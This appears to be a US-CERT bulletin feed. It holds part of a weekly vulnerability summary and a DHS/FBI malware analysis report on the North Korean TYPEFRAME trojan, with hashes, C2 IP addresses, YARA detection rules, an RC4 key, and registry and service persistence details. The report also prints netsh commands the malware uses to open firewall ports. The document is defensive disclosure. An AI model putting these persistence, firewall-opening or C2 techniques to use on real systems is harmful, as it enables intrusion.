The TIBCO Administrator server component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, and TIBCO Administrator - Enterprise Edition for z/Linux contains vulnerabilities wherein a malicious user could perform XML external entity expansion (XXE) attacks to disclose host machine information. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions up to and including 5.10.0, and TIBCO Administrator - Enterprise Edition for z/Linux: versions up to and including 5.9.1.2018-06-13not yet calculatedCVE-2018-5433
BID
CONFIRM
tibco_software -- tibco_runtime_agent
 
The TIBCO Designer component of TIBCO Software Inc.'s TIBCO Runtime Agent, and TIBCO Runtime Agent for z/Linux contains vulnerabilities wherein a malicious user could perform XML external entity expansion (XXE) attacks to disclose host machine information. Affected releases are TIBCO Software Inc.'s TIBCO Runtime Agent: versions up to and including 5.10.0, and TIBCO Runtime Agent for z/Linux: versions up to and including 5.9.1.2018-06-13not yet calculatedCVE-2018-5434
BID
CONFIRM
tinyexr -- tinyexr
 
tinyexr 0.9.5 has a heap-based buffer over-read in tinyexr::DecodePixelData in tinyexr.h, related to OpenEXR code.2018-06-11not yet calculatedCVE-2018-12092
MISC
tinyexr -- tinyexr
 
tinyexr 0.9.5 has a heap-based buffer over-read in LoadEXRImageFromMemory in tinyexr.h.2018-06-16not yet calculatedCVE-2018-12503
MISC
MISC
tinyexr -- tinyexr
 
tinyexr 0.9.5 has a memory leak in ParseEXRHeaderFromMemory in tinyexr.h.2018-06-11not yet calculatedCVE-2018-12093
MISC
tinyexr -- tinyexr
 
tinyexr 0.9.5 has an assertion failure in ComputeChannelLayout in tinyexr.h.2018-06-16not yet calculatedCVE-2018-12504
MISC
MISC
trend_micro -- officescanA vulnerability in Trend Micro OfficeScan 11.0 SP1 and XG could allow a attacker to use a specially crafted URL to elevate account permissions on vulnerable installations. An attacker must already have at least guest privileges in order to exploit this vulnerability.2018-06-12not yet calculatedCVE-2018-10508
CONFIRM
trend_micro -- officescan
 
A vulnerability in Trend Micro OfficeScan 11.0 SP1 and XG could allow a attacker to exploit it via a Browser Refresh attack on vulnerable installations. An attacker must be using a AD logon user account in order to exploit this vulnerability.2018-06-12not yet calculatedCVE-2018-10509
CONFIRM
trend_micro -- officescan
 
A vulnerability in Trend Micro OfficeScan 11.0 SP1 and XG could allow a attacker to take a series of steps to bypass or render the OfficeScan Unauthorized Change Prevention inoperable on vulnerable installations. An attacker must already have administrator privileges in order to exploit this vulnerability.2018-06-12not yet calculatedCVE-2018-10507
MISC
CONFIRM
EXPLOIT-DB
ucmbd -- ucmbd_browser
 
Remote Cross-site Request forgery (CSRF) potential has been identified in UCMBD Browser version 4.10, 4.11, 4.12, 4.13, 4.14, 4.15, 4.15.1 which could allow for remote unsafe deserialization and cross-site request forgery (CSRF).2018-06-15not yet calculatedCVE-2018-6496
CONFIRM
ucmbd -- ucmbd_server
 
Remote Cross-site Request forgery (CSRF) potential has been identified in UCMBD Server version DDM Content Pack V 10.20, 10.21, 10.22, 10.22 CUP7, 10.30, 10.31, 10.32, 10.33, 10.33 CUP2, 11.0 and CMS Server version 2018.05 BACKGROUND which could allow for remote unsafe deserialization and cross-site request forgery (CSRF).2018-06-15not yet calculatedCVE-2018-6497
CONFIRM
virus_total -- yara
 
In YARA 3.7.1 and prior, parsing a specially crafted compiled rule file can cause an out of bounds write vulnerability in yr_execute_code in libyara/exec.c.2018-06-15not yet calculatedCVE-2018-12035
MISC
MISC
CONFIRM
virus_total -- yara
 
In YARA 3.7.1 and prior, parsing a specially crafted compiled rule file can cause an out of bounds read vulnerability in yr_execute_code in libyara/exec.c.2018-06-15not yet calculatedCVE-2018-12034
MISC
MISC
CONFIRM
vmware -- nsx_sd-wan_edge
 
VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution.2018-06-11not yet calculatedCVE-2018-6961
BID
CONFIRM
wolfssl -- wolfssl
 
wolfcrypt/src/ecc.c in wolfSSL before 3.15.1.patch allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12436
MISC
MISC
MISC
wordpress -- wordpress
 
An issue was discovered in the WpDevArt "Booking calendar, Appointment Booking System" plugin 2.2.2 for WordPress. Multiple parameters allow remote attackers to manipulate the values to change data such as prices.2018-06-13not yet calculatedCVE-2018-10363
MISC
ximdex -- ximdex
 
The /edit URI in the DMS component in Ximdex 4.0 has XSS via the Ciudad or Nombre parameter.2018-06-13not yet calculatedCVE-2018-12273
MISC
ximdex -- ximdex
 
xowl/request.php in Ximdex 4.0 has XSS via the content parameter.2018-06-13not yet calculatedCVE-2018-12272
MISC
xiongmai -- uc-httpd
 
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.2018-06-08not yet calculatedCVE-2018-10088
MISC
EXPLOIT-DB
yii2 -- yii2
 
The Yii2-StateMachine extension v2.x.x for Yii2 has XSS.2018-06-13not yet calculatedCVE-2018-12290
MISC
Back to top

This product is provided subject to this Notification and this Privacy & Use policy.


 Thu, 14 Jun 2018 16:04:10 +0000 North Korean Malicious Cyber Activity
Original release date: June 14, 2018

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have identified Trojan malware variants—referred to as TYPEFRAME—used by the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.

US-CERT encourages users and administrators to review Malware Analysis Report (MAR) 10135536-12 and the US-CERT page on HIDDEN COBRA - North Korean Malicious Cyber Activity for more information.


This product is provided subject to this Notification and this Privacy & Use policy.


 Thu, 14 Jun 2018 14:16:49 +0000 AR18-165A: MAR-10135536-12 – North Korean Trojan: TYPEFRAME
Original release date: June 14, 2018

Description

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. The DHS does not endorse any commercial product or service, referenced in this bulletin or otherwise.

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. Government partners, DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra.

DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users and administrators should flag activity associated with the malware, report the activity to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections.

For a downloadable copy of IOCs, see:

Submitted Files (11)

201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33 (1C53E7269FE9D84C6DF0A25BA59B82...)

20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64 (EF9DB20AB0EEBF0B7C55AF4EC0B7BC...)

3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210 (java.exe)

40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116 (CA67F84D5A4AC1459934128442C53B...)

4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd (3229A6CEA658B1B3CA5CA9AD7B40D8...)

546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1 (6AB301FC3296E1CEB140BF5D294894...)

675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1 (10B28DA8EEFAC62CE282154F273B3E...)

8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8 (F5A4235EF02F34D547F71AA5434D9B...)

c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777 (BFB41BC0C3856AA0A81A5256B7B8DA...)

d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92 (BF474B8ACD55380B1169BB949D60E9...)

e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7 (60294C426865B38FDE7C5031AFC4E4...)

Additional Files (3)

089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359 (midimapper.rs)

a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6 (laxhost.dll)

e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef (dwnhost.dll)

IPs (7)

111.207.78.204

181.119.19.56

184.107.209.2

59.90.93.97

80.91.118.45

81.0.213.173

98.101.211.162

Findings

8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8

Tags

remote-access-trojantrojan

Details
NameF5A4235EF02F34D547F71AA5434D9BB4
Size490705 bytes
TypePE32 executable (GUI) Intel 80386, for MS Windows
MD5f5a4235ef02f34d547f71aa5434d9bb4
SHA1338699d56f17ab91fa2da1cb446593c013ae1a01
SHA2568c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8
SHA51227c610096248492fce0f8f478c62255cd1abc4ceb4a1ae310ca311a6d38ee3b93ce75ba45089204d0eb2036393bdcb98b3e77396d5ae6b9eecacc3a019ed225e
ssdeep12288:2okf/Epk6/lctEJxrXtl3h1ihDnjvAHR7ie5XtO/DRUKwS4Z/B5:2o6/EpH/iwNXtlhSnjg+e5A/DaZp5
Entropy7.788643
Antivirus
AviraTR/Crypt.ZPACK.Gen
SymantecHeur.AdvML.C
Yara Rules
hidden_cobra_consolidated.yararule enc_PK_header { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4" strings: $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 } $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a } $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them }
hidden_cobra_consolidated.yararule import_obfuscation_2 { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51" strings: $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6 D5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3 03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them }
ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-06-05 21:21:28-04:00
Import Hashedb148321293bdc8b7ba8fbe0b1c6ed9
PE Sections
MD5NameRaw SizeEntropy
dde6c6e739f41680377511c709f7209aheader40960.590336
db44e1900789a7fd43b05d3871c9ab03.text532486.538652
91d9797bd52d49fb73009fc3e0cdd7c5.rdata122883.476192
ef4ab26cc2c30397b12c53c759fcbef2.data163842.132158
Packers/Compilers/Cryptors
Microsoft Visual C++ v6.0
Relationships
8c3e0204f5...Containsa71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6
Description

This file is a 32-bit Windows portable executable file designed to install a Remote Access Trojan (RAT) as a service on the victim system. The malware accepts the following argument during execution "68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd”.

The RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--


Decrypted strings of interest are displayed below:

--Begin strings of interest--
host.dll
"Task Notification Service"
"Monitors And Notifies Task Scheduling And Interaction"
netsvcs
--End strings of interest--


When executed, the RAT checks if the module "C:\Windows\system32\laxhost.dll" is installed on the compromised system. If it is not installed, it will load an embedded RC4 encrypted archive file from the start of the offset "0x15000”.

The malware decrypts the archive using the same RC4 key. The decrypted archive contains a malicious DLL module, which is decompressed and installed into "C:\Windows\system32\laxhost.dll”. The first three characters of the module name are randomly generated.

The malware contains an RC4 encrypted configuration file data (192 bytes). During runtime, it installs the encrypted configuration data into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--


The malware installs a malicious DLL module as a serviceDLL in the "netsvcs" service group in order to execute "C:\Windows\system32\laxhost.dll" using the Windows service hosting process, "%SYSTEMROOT%\system32\svchost.exe." The service name and the display name are randomly generated.

The installed service information is displayed below:

--Begin service information--
ServiceName = "Irmon"
DisplayName = "Irmon"
DesiredAccess = SERVICE_ALL_ACCESS
ServiceType = SERVICE_WIN32_SHARE_PROCESS
StartType = SERVICE_AUTO_START
BinaryPathName = "%SYSTEMROOT%\system32\svchost.exe -k netsvcs"
--End service information--

a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6

Tags

backdoorremote-access-trojantrojan

Details
Namelaxhost.dll
Size843776 bytes
TypePE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5aa7924157b77dd1ff749d474f3062f90
SHA14f02a6bf2b24c371e9f589cff8e32b4d94cf4f29
SHA256a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6
SHA5125150d8b063297d0da04288b4e4e2ad3d54b7546d909a71557789529d73703673098c37970280cd62c45306458cfcda701c1a7cee31ee7fb2192e627e11f0a3bd
ssdeep24576:r/pmC31xkE8sOvtQ6Wtuc0WhgpaM2yYq:bpj0E8sOvtQ6Wtuc0WhgpaM2yYq
Entropy6.681288
Antivirus
Microsoft Security EssentialsBackdoor:Win32/SilverMob.A!dha
Yara Rules
hidden_cobra_consolidated.yararule import_obfuscation_2 { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51" strings: $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6 D5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3 03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them }
ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-06-09 13:59:30-04:00
Import Hash180f8d53e7b967e9af9444547c05f192
Company NameMicrosoft Corporation
File DescriptionXps Object Model in memory creation and deserialization
Internal Namexpsservices.dll
Legal CopyrightMicrosoft Corporation. All rights reserved.
Original Filenamexpsservices.dll
Product NameMicrosoft Windows Operating System
Product Version6.1.7601.17514
PE Sections
MD5NameRaw SizeEntropy
e1b6f98aadc18cf1b2e1796eb3d8b783header40960.800174
5d97a9d06913043a085d8071f7a5ab7c.text5406726.661444
bab7eb304870fe36e8c98f5085b8603c.rdata1638406.184319
33e00b6b91f87e1e948a8bc44803837f.data819204.853104
4093ef4294e5d39c92ba4d89a6c92a15.rsrc81923.983157
39ddff289842b4fafc796c9795b870c8.reloc450565.723684
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Relationships
a71017302e...Connected_To59.90.93.97
a71017302e...Contained_Within8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8
Description

laxhost.dll (original name: KDCOLCWP.DLL) is a 32-bit Windows dynamic-link library (DLL) file and is a RAT module that was installed as a service by the file 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8.

laxhost.dll’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--

When executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains hexadecimal-encoded C2 IP address and port number:

--Begin IP and port # list -
BB 01 3B 5A 5D 61 ==> 59.90.93.97:443
--End IP and port # list --

The malware attempts to connect to its C2 server 59.90.93.97 using port 443 and wait for further instructions.

The malware is designed to accept instructions from the remote server to perform the following functions:

--Begin functions performed by the malware--
Get Disk Free Space
Search for files
Execute process in elevated mode
Terminate processes
Delete files
Execute command-using shell
Download and upload files
Read files and write files
Delete Service and uninstall malware components using a batch script
--End functions performed by the malware--

675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1

Tags

proxytrojan

Details
Name10B28DA8EEFAC62CE282154F273B3E34
Size466267 bytes
TypePE32 executable (GUI) Intel 80386, for MS Windows
MD510b28da8eefac62ce282154f273b3e34
SHA125991d00eb1b1204b0066d5aeb79ac691047d7f0
SHA256675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1
SHA5127955c46e3d5ed3454340821caecd44d6bc1b918ef7bdcd6f0f8d67676cbf0fde52a578583a0388c4d838652d3d1da4615ced6ae2c59b562f030f752cbc7bfb99
ssdeep6144:qoXLxi/EpH/ae6jEazjsHZ3OJJMUc6ngmOsH95rjw26XwXFLP7E1tC1KRtyn5o1n:qoQ/EpH/mEaiZiJy6ngm95t6qLPJp2d
Entropy7.761748
Antivirus
ESETa variant of Win32/Agent.YDV trojan
Microsoft Security EssentialsTrojan:Win32/Autophyte.B!dha
SymantecHeur.AdvML.C
Yara Rules
hidden_cobra_consolidated.yararule enc_PK_header { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4" strings: $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 } $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a } $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them }
hidden_cobra_consolidated.yararule import_obfuscation_2 { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51" strings: $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6 D5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3 03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them }
ssdeep Matches

No matches found.

PE Metadata
Compile Date2016-07-24 19:38:33-04:00
Import Hash225e9f7be86d6676c98a852492458049
PE Sections
MD5NameRaw SizeEntropy
58c7eb8637b7fbde7bb31985b77ca1afheader40960.591843
65d9f034d6153048c3e51bf5e07d6486.text532486.446416
eb9c5e8a429ac587cd35f0dcec939295.rdata122883.434883
d80b556aaa361958d9ecd816ac2a36c7.data163842.106829
Packers/Compilers/Cryptors
Microsoft Visual C++ v6.0
Relationships
675a35e04b...Containse69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7
Description

This file is a 32-bit Windows executable designed to install a proxy module as a service on the victim’s system. This file accepts the following arguments during execution: "68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd."

The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--

Decrypted strings of interest are displayed below:

--Begin strings of interest--
"wmplayer.xml"
"printcache.tlb"
"Print Device Cache"
"Manage Print Device Cache And Printing"
printcache
--End strings of interest--

When executed, it will load an embedded RC4 encrypted archive file from the start of the offset "0x15000."

The malware decrypts the archive using the same RC4 key. The decrypted archive contains a proxy module, which is decompressed and installed from the existing file name "wmplayer.xml" to "C:\Windows\system32\printcache.tlb."

The malware installs the module as a serviceDLL in the "printcache" service group in order to execute "C:\Windows\system32\printcache.tlb" using the Windows service hosting process, "%SYSTEMROOT%\system32\svchost.exe."

--Begin service--
ServiceName = "printcache"
DisplayName = "Print Device Cache"
DesiredAccess = SERVICE_ALL_ACCESS
ServiceType = SERVICE_WIN32_SHARE_PROCESS
StartType = SERVICE_AUTO_START
BinaryPathName = "%SYSTEMROOT%\system32\svchost.exe -k printcache"
--End service--

The malware contains an RC4 encrypted configuration file data, which contains port numbers (8 bytes). During runtime, it installs the encrypted configuration data into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7

Tags

proxytrojan

Details
Name60294C426865B38FDE7C5031AFC4E453
Size778240 bytes
TypePE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD560294c426865b38fde7c5031afc4e453
SHA1f8736e3f89f30f082cfd68a73763afcfb0e1c9c3
SHA256e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7
SHA512fe96fa2f127a3a71a9edc89268567188f8c585ea8356feb9a2c46224dc7022b3d751848424df745b517e7a1e123c566b6feb094653281026ffd2e9ce81d5a7a1
ssdeep12288:8iwDMd29KJgSWD8QfEbsjlqxlsiAen1XQ1pV+jPAt:8WghEbvhAeC1pIDAt
Entropy6.714021
Antivirus
AhnlabTrojan/Win32.Agent
BitDefenderGen:Variant.Symmi.14589
EmsisoftGen:Variant.Symmi.14589 (B)
F-secureGen:Variant.Symmi.14589
Microsoft Security EssentialsTrojanProxy:Win32/SilverMob.A!dha
Yara Rules
hidden_cobra_consolidated.yararule import_obfuscation_2 { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51" strings: $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6 D5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3 03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them }
ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-03-02 14:01:47-05:00
Import Hash09e63e3d425d6b543de4003f71c2b66d
PE Sections
MD5NameRaw SizeEntropy
1eda6d8dec57fac45afb42a6f27080a0header40960.767469
4109d939d8532ac1bd9f2cfa81a33905.text4751366.632858
3b24a4913977b402a4dcce1694306cfb.rdata1474565.923542
f597eb4917ef44a2f9a080fc59f528f3.data778244.968551
77c814f5856057e7a7f6237bbba51a76.rsrc327687.100017
438ec3064d499d63eb03035aa1f7a142.reloc409605.759460
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Relationships
e69d6c2d3e...Contained_Within675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1
Description

This file, printcache.tlb (original name: PDll.dll), is a proxy module installed as a service by the file 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1. This file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server.

The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End Rc4 key--

When executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains hexadecimal encoded port numbers:

--Begin port # list --
BB 01 ==> 1BB ==> 443
7F 00 ==> 7F ==> 127
90 1F ==> 1F90 == 8080
--End port # list --

The malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming connections.

--Begin firewall modification--
"netsh.exe advfirewall firewall add rule name="PortOpenning" dir=in protocol=tcp localport=443 action"
--End firewall modification--

The malware attempts to open ports 443, 127, and 8080 and wait for a connection. The malware contains public SSL certificates in its resource named "101” and is designed to generate crafted TLS sessions (fake TLS communication mechanism).
 

089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359

Tags

proxytrojan

Details
Namemidimapper.rs
Size761856 bytes
TypePE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD500b0cfb59b088b247c97c8fed383c115
SHA10cdee734d3a17de0e81b9b2b0b36804d516c3212
SHA256089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359
SHA5129c9f65e277816a42574ddc28724e1afde8c3bffd0e8bf2e0414204d7b07384848718ada43e59c206b6d13dca33c28c4ae3a82ec12b21207efa5cbb8abfacf7d6
ssdeep12288:5XYoUXvfAkdRwowG358mOlVvRaXKgCJpV4DDxazfAF:+zwowHJ46jJp+DmfAF
Entropy6.693566
Antivirus
AhnlabTrojan/Win32.Agent
BitDefenderGen:Variant.Symmi.14589
ESETWin32/NukeSped.AQ trojan
EmsisoftGen:Variant.Symmi.14589 (B)
F-secureGen:Variant.Symmi.14589
IkarusTrojan.Win32.Agentb
K7Trojan ( 0051e0501 )
Microsoft Security EssentialsTrojanProxy:Win32/SilverMob.A!dha
NANOAVTrojan.Win32.NukeSped.eylorq
Quick HealGenvariant.Symmi
VirusBlokAdaTrojan.Agentb
Zillya!Trojan.Agentb.Win32.18439
Yara Rules
hidden_cobra_consolidated.yararule import_obfuscation_2 { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51" strings: $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6 D5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3 03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them }
ssdeep Matches
100dfb41457088fa2003a085c325bcb63666e1e66fa36bdc8975995bfbeac39500d
PE Metadata
Compile Date2016-07-25 03:12:34-04:00
Import Hash100f0ee6d217c6b9e15be71a6c42a2d3
PE Sections
MD5NameRaw SizeEntropy
93649845b04705777d78e05982b93e5fheader40960.765196
93649845b04705777d78e05982b93e5fheader40960.765196
aca858c8ea569b991797da02f8613716.text4587526.614177
aca858c8ea569b991797da02f8613716.text4587526.614177
11b9d8a29ef67ebb2c19f753f1c7ada4.rdata1474565.918054
11b9d8a29ef67ebb2c19f753f1c7ada4.rdata1474565.918054
72b7a8f5d846964649b682d6ef074cc0.data778244.964840
72b7a8f5d846964649b682d6ef074cc0.data778244.964840
d73a8feca0f13f34575c84df77fbed0e.rsrc327687.100191
d73a8feca0f13f34575c84df77fbed0e.rsrc327687.100191
61c29b19fe37db83e42ef9ddf46eb40f.reloc409605.689934
61c29b19fe37db83e42ef9ddf46eb40f.reloc409605.689934
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Description

midimapper.rs (original name: MDll.dll) is a proxy module installed as a service. This file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server.

The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End Rc4 key--

When executed, the malware loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains hexadecimal encoded port numbers:

-- Begin port # list --
FB 20 ==> 20FB ==> 8443
-- End port # list --

The malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming connections.

--Begin firewall modification--
"netsh.exe advfirewall firewall add rule name="PortOpenning" dir=in protocol=tcp localport=8443 action=allow enable=yes"
--End firewall modification--

The malware attempts to open port 8443 and wait for connection. The malware contains public SSL certificates in its resource named "101”. It is designed to generate crafted TLS sessions (fake TLS communication mechanism).

d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92

Tags

proxytrojan

